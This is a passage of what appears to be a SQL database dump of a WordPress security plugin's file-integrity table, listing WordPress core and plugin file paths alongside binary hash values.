�\'���R\'n�7s�b3|','',0,'?'),('�����k2�nŒ���','wp-content/plugins/wp-cerber/cerber-scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�\nm�/̛�XI','��c��`�Rd~��R����z�A�ʌy�U7','',0,'?'),('��v�E,�-O�{���','wp-includes/link-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l?,�����w��DU�','&i�>J<������GC�8�>r�h�ು�A','',0,'?'),('��o���?��ݬ���','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Nw�?���Z��','�u,^�~�U�H&	GwɢӴJ5V�x��$���)','',0,'?'),('�!�LT�3��i��x�','wp-admin/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B~-���<d�4g','��·\"7u�9N��kŎ�����!9�.��','',0,'?'),('�/�}��¦��kA�Zj','wp-includes/blocks/query-pagination/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ֺƺ��g���?�','1B�O=����.��~��H?l2�T���͌XT�','',0,'?'),('�=`�:������x~��','wp-includes/blocks/site-logo/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Md�O�E1�����z�C�','�G4�&�S�y�(�FH�����Ԑ���','',0,'?'),('�M�Tq&[?��>칊�\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�9+�\"��+��','B��m��N��h�����stN��jAS4X\0$','',0,'?'),('�M����z�ŭY���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�Vd	]�=M[[ٿ���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�nr�\'U���o{��','�BS�?jP����0h~q��G�^K�ew�vO','',0,'?'),('�V�ڮ����M��jӁ','wp-includes/js/plupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('���i��n�j/�r��','wp-includes/js/dist/i18n.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˭N�]��!e�=F','>+W��x��Lߤ�H�<ա�)8�a�$]��Y�=','',0,'?'),('́ԑ�A�Ha]�\':�','wp-includes/blocks/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L����K�\"Ќ�/n','�j�ba�+���{�j�Ȉ�uYYJb(D,�p�','',0,'?'),('̋��q�B3a�Y��-�','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0`\'}�(���b���A#','c,�Bp�2�8���0j��7}hp-��宆','',0,'?'),('̏ȩ�2)VccQ92G|','wp-content/plugins/wordfence/js/wfglobal.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jf\'�?g�m:���','X�c\Z]R@���1�qw�)�kl�Q���Q�','',0,'?'),('̙~�Ȍî+���byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�숊z��;5!��','�D�\Z���L�ޠΔa��]n�\n���L&�\n','',0,'?'),('̸����-]\Z���n�','wp-includes/sodium_compat/src/Core/Ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k9�wZ��~�� ��\'',' z�`WN?]�ӟ�B,K���Jl��W��>k�','',0,'?'),('�Ê5ff�;,G!\'��\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<��:۶H\n�=|�','H�/������u7�{�UX\nyC��)�����]','',0,'?'),('�����\";+�\rxu���w','wp-includes/js/mediaelement/renderers/vimeo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�NJ�E�v�c,�صyS^','wp-includes/images/crystal/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('����p�j֛`��w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���Vf�D�\\1��f','��3���?��u)0�Űa�8t����gH���','',0,'?'),('�d���lP�O�I�','wp-admin/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DlR����=���@n','ٔ�fİ��	�qRK/�h��XٱVJH&k�HPB','',0,'?'),('�)����\0�e�_�5=�','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Q ����f��7�F','�Ҏ��E����؊>^!j��\0O���ca��^��','',0,'?'),('�K=�X�a:�\'5�','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),('�^&��`R�y����J','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}n�3;g)���','\nj�^�����C�(��UU�i\'9�O','',0,'?'),('�m��L0N\"�T~�b�','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%���	^#','',0,'?'),('�w�9=�_\"h%��v','wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�6��9�A:ET�','\"�w(\r�ħE��M��G�x�Y[��\"��=','',0,'?'),('͎3ע�Jyn�ĀM�','wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nq*��ZF�)2�','�&4\"\rQ�jX�mN\"��?P�o��\\��?���','',0,'?'),('͓�Y�36��l�Y��','wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('ͤ8B���¸]��E|','wp-content/plugins/wp-cerber/assets/flags/ky.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M� �d�pV�,�d�','��QP�8�TG�{jrNK�-��,�/l�j	��','',0,'?'),('ͪu�owsFC�G[c��','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8^pي�Y�[,��F.','$vx%��c���7I\\��%����TH˞�	','',0,'?'),('Ͷ�jʃఱ���-�','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:د_x��O0�8���X','�[�|�r�;�������Ƹ����l�b���	Q','',0,'?'),('ͽ3��=��O�G�|~�','wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('�ϘFvD�̫H�','wp-content/plugins/wp-cerber/assets/flags/tg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f/f�|f~�8','=JUV�1H���kE����OZ�oD\\��׭','',0,'?'),('��3�����F�<��8','wp-includes/js/underscore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��PS�)��(�%��','T�����W�d�FɼA��ۗ����-�g�z�� ','',0,'?'),('��S�>s�U)����H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('���j(g��~jU#��','wp-admin/includes/class-wp-filesystem-ssh2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*;h��TM�yI�','S�}%+m�<��TY9�@���D�[����X�y��f\\','',0,'?'),('�G�6�&���A��+','wp-content/plugins/redirection/matches/custom-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z���J{���HZ>��P','Yg=f�-l)jT�����fu\0�ޠ1�9�P','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�z)Ue���$t��\r','��;-�f�N��I�Y��Yڲ���e��\r�','',0,'?'),('�_)-�]�ˌkO	��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)���H�G���>�','ٚ+��\"�Bt���	\'S_��̄E�s��_�)^�','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�|��f�����,2�T	','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�3&�Е��(6�&�','H�4\0�p�B��a��m�f���SU\n��T','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('α�Z	��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k���d�`�>�C��','��a��5�ÔC�ms�kY�v��y4�V����','',0,'?'),('���+4#�E����Wl�3','wp-content/plugins/wp-cerber/assets/flags/ma.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E3ц�Җ`?n~','�Lx����9�yՌ�6luт�l�Ca�e@���','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('��������\n�P','wp-includes/blocks/quote/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=9>V-@`鮏q��C',']w!��D )g��\Z����⸓9��f��ɑ���','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('�!�h��R��ah�T�C\0','wp-content/plugins/wordfence/css/wfselect2.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����3,B�V���','��ڑ�t4U��\"�;�t�7�\Z�Jy�rb@','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��+N�}G�r��q','� )�Y��H��\n\0i�3_:):���Q^�','',0,'?'),('�26�6�#	S[h(\\��','wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"w1�jym���`�<�',')C����n�Я���p}ϊ2���g�S���7{','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�_q ^��<�8��:�	','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3A���,�G�_��Z���','dH\r�e�O��DW�·Om�.�+GkC/������','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fvb̵|�\\V�g�','O��ـ%�߿���\'Z3�p*���-�؁','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������YA2M�/','�ޱhz`���X~�>:XBn|4�,�̸���f�','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��Y���a��y',';9ϛ%�ٛۧ�p��G���r&Ze�;eO;���j','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�,Ǿ	��YQA�k','�7T�����Ə��aY���,���X��8�','',0,'?'),('�@��AO=	�yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('��]mٲ�	▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩	��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('����gs��)݅','wp-includes/blocks/latest-posts/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�\r6H�O\0HXv1�\'�','��͹��%�yO�5�%��l���hb�ž��Hc�','',0,'?'),('�\Z��YÅjxU�#�6�k','wp-content/plugins/wp-cerber/assets/flags/mx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�W6;���%����','E���&8��0�`�����\ZQ3`���w]#�ע','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\nP?^��u:�	','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('�KH��p׵�<a�A���','wp-content/themes/newsmagbd/vendors/bootstrap/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1ܡ�i#�v�vLX�','���.bHԱ��=��\\��-�]3�����k{��','',0,'?'),('�T޼q%<>z�բ�','wp-content/plugins/wp-cerber/assets/flags/bv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('Е\rH��´7��','wp-content/plugins/redirection/locale/redirection-en_ZA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k^dα&6�Z��','	��\\4�~��>	�>��䀏Ir�x���o��{','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 	�J<�g��o�9:x','�n�c���x0�ĥ���t��N���޾Y2X\0!','',0,'?'),('��u|�=:�1���v�','wp-includes/blocks/post-excerpt/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qj�)O=S�R��','oC�l\'�6IJ�j���2�\'\Z�l\'�\n��}{','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#���6B�o��f�u','�AS\Z3H	��Q9ͳo�@h_��!1S/��x','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�߻V?��a�n\r��','�E������a,�\Z��,yM�/\\iQ�Ӡ\"�?28','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y2eR���ۻ�I��','Rws�5Ǩ6����Т�Kx�i,�u|��','',0,'?'),('��EU���-ф�M��:','wp-includes/blocks/more/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�<%g�gdϑ��','[|��.Nˡ����?O��];�#���5�ه�T','',0,'?'),('�&\00%�S��n\Z�‡e','wp-content/plugins/redirection/matches/http-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}5P$Lg.\"�[�~��','f�أ�,���e���?�̑K���l�9','',0,'?'),('�:�\n��y�ˌ\"4�','wp-includes/blocks/text-columns/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��`}�N�\n��X','�t!��l�`�|*�^���0�	�l$C���;��','',0,'?'),('�?zW>����bwx','wp-content/plugins/redirection/locale/redirection-en_AU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����lT��˘X��','Md\'�����m�a�y�J� v\r�Z֠��Ui6�','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��l�w|�JN�.','T���\\w�b)�h�R|�9��f�\Zɥ����','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n-ɞ3Z��2���>�','z��\r�i�\'\\\r�jL���㤑�4!�U��','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH	�','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'?V@�\ZO�b#!Tk�B','?V@�\ZO�b#!Tk�B','��Q��~kU5\n�؀mw�p��;+:�5�4�','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u����G�9�GN�X',';��M/\n���Ք_(��+�`d�D��_tD��','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɏ|W��/��	��','N��y9_Ȗ�y����E�A�3���\r�|��','',0,'?'),('�8�s鎗��߹Oh�','wp-includes/js/dist/vendor/regenerator-runtime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U����Ϩ��Z��#-','�U��gO��jZ��~�ͣ9�a�����%','',0,'?'),('�j�i�� �\nT�槿\r','wp-includes/blocks/post-featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�Oc�9�·è�$�','+��%��\0�6�wb�0��Z����Z��Q&','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����ߟ*׉k+;8','7���M$<�rO9�Gj���Ey��Q*+�3','',0,'?'),('Ҟ���ǟ�	Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�\'v|\"��}�7߶','=�����\rPr�Ӹ,�w�\\j�MC����X\n]�','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�0:�DR&�qͱ','m������H��z���Á�9���B�l\0~�m�','',0,'?'),('������ƶ��8AX@','wp-content/plugins/wp-cerber/admin/cerber-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ő\0�U��*���MW�','F��%_�����a�%���]\0�Ƌ*��\\�JI$a ','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N�	��P�{��','',0,'?'),('��l��I\r,�B8�','wp-includes/blocks/quote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!u�\0��۔s��','J�A\rh�W�\r>�=�hk2�1L�ܬMs�?m','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z��|JS���','����i\\�JkF��t\\�\0x��Re�he�&j�','',0,'?'),('�M�p�\0���`k�nP','wp-includes/template-canvas.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��l���mN��Q','��%�\nU��d�L���JK��=����C��','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'y��ԯ��~���C(\"','y��ԯ��~���C(\"','�V4��m����0so$*D��0J4�NG+���p#','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=hw\Z�{\"`Pl��','NU�2��|��2A���T�$��\r#%�:�','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �\rͳ�yzbg\'��G','7��q����\\���r�ܛ)[%#�JS�!�J','',0,'?'),('�s�G������S4�','wp-content/plugins/wp-cerber/assets/flags/ca.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�1���I��;pl�s�','��Bx���zU�O.�.t��XB�@ͤ��%��','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r-�;�0h)\n���E�','��$���E\Z]x�Y�7�}�a�83o#MP�P','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('ӕ����\n��t�0','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mpG���aB��NX>��(','%�-*Ψ6F��i�\rWϹ�M׽�WI���:�v�D','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('Ӣ������\\\'�A)Ӫ','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q!��\0𭀠\'��','�W�4$a���\'x���-��Kμ�#�Z��','',0,'?'),('Ӥ����ǕL�F��ZQ','wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�p�Q,�� 8��*\Z�','׎s{����3\r3U� �nG��n]�����>�','',0,'?'),('Ө]Z����l9�N\0','wp-content/plugins/redirection/database/schema/latest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�4�M����ä','�������.�c�8��Y��tTw`hGG\'�dh�','',0,'?'),('�э�o(�H�ttx�.','wp-includes/blocks/table/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۰&R1W6zz�X��','/���������jʆ�jA��<9?ނ)�w2h�','',0,'?'),('�Ҡ�5�������i*Ǡ','wp-content/plugins/wp-cerber/assets/flags/ms.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֠��G/�������Ҳ','�cZ��/�n�[�`��=\Z4�~��+�)%�k�','',0,'?'),('��5���ĺ�%��','wp-includes/blocks/buttons/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3�u�XWd�a','��o�-�~.q���Ǣ׽���L��;1�*�','',0,'?'),('��H��AG�|����\"�','wp-includes/blocks/nextpage/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쮥�@֦�`fx�W�','��\'���\Z[��	<A�����At��؏M�','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^g�v~�9Qu�i�\r�','+���ƱO�N6���,�F���]�ڷ�O��/','',0,'?'),('�?H4�V�����\n��','wp-includes/blocks/pullquote/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�PRPp��iy+T���','7`��Q�yg�7s�%\'_��dLڿ���P��','',0,'?'),('�	kJ�?� �@x����','wp-includes/blocks/categories/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�,��6�3�O.��','͚i?�e�zΏ%��=�T��n��N\\Ƅ���','',0,'?'),('�����0*�W��','wp-content/plugins/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�].�oo�ȦM-n	�','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S׊����Y����S`','',0,'?'),('�l�.�}+�S�c�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Tf������','��`�<���DadXjM� 	<��\r[j�ߕA�m','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɖ!�}��Mv���^�',' ���Z\Z��|=G�&;���\\�I�����9-)l�','',0,'?'),('Ԝd�&;0�